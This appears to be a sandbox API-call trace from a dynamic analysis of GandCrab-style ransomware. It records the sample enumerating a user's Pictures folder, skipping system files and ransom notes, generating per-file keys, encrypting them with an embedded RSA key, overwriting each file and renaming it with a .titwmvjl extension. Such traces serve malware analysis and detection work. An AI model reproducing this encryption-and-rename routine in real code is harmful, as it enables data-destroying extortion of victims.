0x2410000 [0094.882] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.882] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.883] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\d2ca4a09d2ca4deb61a.lock") returned 60 [0094.883] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\y1mf\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0094.883] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.883] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\") returned 36 [0094.883] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\*" [0094.883] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5035b8 [0094.883] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.884] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0094.884] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.884] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.885] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0094.885] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0094.885] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0094.885] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\d2ca4a09d2ca4deb61a.lock" [0094.885] lstrlenW (lpString=".titwmvjl") returned 9 [0094.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\d2ca4a09d2ca4deb61a.lock") returned 60 [0094.885] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.885] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 69 [0094.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\d2ca4a09d2ca4deb61a.lock") returned 60 [0094.885] lstrlenW (lpString=".lock") returned 5 [0094.885] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.885] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0094.885] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.885] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.885] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0094.885] lstrcmpW (lpString1="ozCtv44EA.gif", lpString2=".") returned 1 [0094.886] lstrcmpW (lpString1="ozCtv44EA.gif", lpString2="..") returned 1 [0094.886] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\", lpString2="ozCtv44EA.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\ozCtv44EA.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\ozCtv44EA.gif" [0094.886] lstrlenW (lpString=".titwmvjl") returned 9 [0094.886] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\ozCtv44EA.gif") returned 49 [0094.886] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.886] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\ozCtv44EA.gif.titwmvjl") returned 58 [0094.886] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\ozCtv44EA.gif") returned 49 [0094.886] lstrlenW (lpString=".gif") returned 4 [0094.886] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.886] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".gif ") returned 5 [0094.886] lstrcmpiW (lpString1=".gif", lpString2=".titwmvjl") returned -1 [0094.886] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.886] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\ozCtv44EA.gif") returned 49 [0094.886] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\ozCtv44EA.gif") returned 49 [0094.886] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="desktop.ini") returned 1 [0094.886] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="autorun.inf") returned 1 [0094.886] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="ntuser.dat") returned 1 [0094.886] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="iconcache.db") returned 1 [0094.886] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="bootsect.bak") returned 1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="boot.ini") returned 1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="ntuser.dat.log") returned 1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="thumbs.db") returned -1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="KRAB-DECRYPT.html") returned 1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="CRAB-DECRYPT.html") returned 1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="ntldr") returned 1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="NTDETECT.COM") returned 1 [0094.887] lstrcmpiW (lpString1="ozCtv44EA.gif", lpString2="Bootfont.bin") returned 1 [0094.887] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\ozCtv44EA.gif") returned 49 [0094.887] lstrlenW (lpString=".gif") returned 4 [0094.887] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.887] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".gif ") returned 5 [0094.887] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.887] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.887] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\ozCtv44EA.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\y1mf\\ozctv44ea.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0094.888] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.888] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0094.888] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.889] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0094.889] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.889] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.889] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.889] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0094.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.890] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.890] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.890] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.890] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0094.890] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.890] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.891] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.891] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0094.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.891] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.891] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.891] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0094.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.892] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503238) returned 1 [0094.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.892] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0094.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.892] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0094.892] GetLastError () returned 0x0 [0094.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.893] CryptDestroyKey (hKey=0x503238) returned 1 [0094.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.893] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.893] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0094.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.893] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503938) returned 1 [0094.894] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.894] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0094.894] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.894] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0094.894] GetLastError () returned 0x0 [0094.894] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.894] CryptDestroyKey (hKey=0x503938) returned 1 [0094.894] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.895] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.895] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.895] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.895] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0xcb7, lpOverlapped=0x0) returned 1 [0094.905] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffff349, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.905] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xcb7, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0xcb7, lpOverlapped=0x0) returned 1 [0094.907] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.907] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0094.908] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.911] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.912] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.912] CloseHandle (hObject=0x2b4) returned 1 [0094.912] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\ozCtv44EA.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\y1mf\\ozctv44ea.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\ozCtv44EA.gif.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\y1mf\\ozctv44ea.gif.titwmvjl"), dwFlags=0x1) returned 1 [0094.913] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.913] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0094.913] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0094.913] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0094.913] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\TITWMVJL-DECRYPT.txt" [0094.913] lstrlenW (lpString=".titwmvjl") returned 9 [0094.913] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\TITWMVJL-DECRYPT.txt") returned 56 [0094.913] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.913] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 65 [0094.913] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\TITWMVJL-DECRYPT.txt") returned 56 [0094.913] lstrlenW (lpString=".txt") returned 4 [0094.913] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.914] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0094.914] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0094.914] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\TITWMVJL-DECRYPT.txt") returned 56 [0094.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\TITWMVJL-DECRYPT.txt") returned 56 [0094.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0094.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0094.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0094.914] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.914] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0094.914] lstrcmpW (lpString1="Z5FgCbIeuCS.gif", lpString2=".") returned 1 [0094.914] lstrcmpW (lpString1="Z5FgCbIeuCS.gif", lpString2="..") returned 1 [0094.914] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\", lpString2="Z5FgCbIeuCS.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\Z5FgCbIeuCS.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\Z5FgCbIeuCS.gif" [0094.914] lstrlenW (lpString=".titwmvjl") returned 9 [0094.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\Z5FgCbIeuCS.gif") returned 51 [0094.914] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.915] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\Z5FgCbIeuCS.gif.titwmvjl") returned 60 [0094.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\Z5FgCbIeuCS.gif") returned 51 [0094.915] lstrlenW (lpString=".gif") returned 4 [0094.915] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.915] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".gif ") returned 5 [0094.915] lstrcmpiW (lpString1=".gif", lpString2=".titwmvjl") returned -1 [0094.915] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\Z5FgCbIeuCS.gif") returned 51 [0094.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\Z5FgCbIeuCS.gif") returned 51 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="desktop.ini") returned 1 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="autorun.inf") returned 1 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="ntuser.dat") returned 1 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="iconcache.db") returned 1 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="bootsect.bak") returned 1 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="boot.ini") returned 1 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="ntuser.dat.log") returned 1 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="thumbs.db") returned 1 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="KRAB-DECRYPT.html") returned 1 [0094.915] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="CRAB-DECRYPT.html") returned 1 [0094.916] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.916] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.916] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="ntldr") returned 1 [0094.916] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="NTDETECT.COM") returned 1 [0094.916] lstrcmpiW (lpString1="Z5FgCbIeuCS.gif", lpString2="Bootfont.bin") returned 1 [0094.916] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\Z5FgCbIeuCS.gif") returned 51 [0094.916] lstrlenW (lpString=".gif") returned 4 [0094.916] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.916] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".gif ") returned 5 [0094.916] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.916] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.916] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\Z5FgCbIeuCS.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\y1mf\\z5fgcbieucs.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0094.917] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.917] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0094.917] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.918] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0094.918] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.918] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.918] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.918] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0094.919] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.919] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.919] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.919] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.919] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0094.919] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.920] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.920] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.920] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0094.920] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.920] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.920] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.920] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.920] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0094.921] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.921] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503978) returned 1 [0094.921] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.921] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0094.921] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.921] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, 